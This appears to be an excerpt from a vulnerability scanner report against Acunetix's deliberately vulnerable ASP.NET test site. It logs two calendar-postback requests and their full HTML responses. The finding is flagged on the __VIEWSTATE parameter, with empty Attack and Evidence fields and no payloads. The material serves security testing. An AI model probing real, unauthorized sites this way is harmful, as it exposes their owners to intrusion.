Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8249&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAcPEZdNoIZGRkjNCV0IaQqatQyOFT4G97gsJT4dA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLbpfDrAwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268Dz%2F9A7%2Ba796Jn05j4iTgWBEiBjcY%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:47:00 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAAcPEZdNoIZGRkjNCV0IaQqatQyOFT4G97gsJT4dA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLbpfDrAwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268Dz/9A7+a796Jn05j4iTgWBEiBjcY=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:White" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8265&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAADJisgNoIZGRkK5xATH0N1T2ZNNl0f8q%2FrvSTpZ0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLPj5iiDgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268D%2FGuXkYtuYqJWaPlQxJzAfpf1MQE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:29:31 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgAADJisgNoIZGRkK5xATH0N1T2ZNNl0f8q/rvSTpZ0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLPj5iiDgKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268D/GuXkYtuYqJWaPlQxJzAfpf1MQE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:White" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
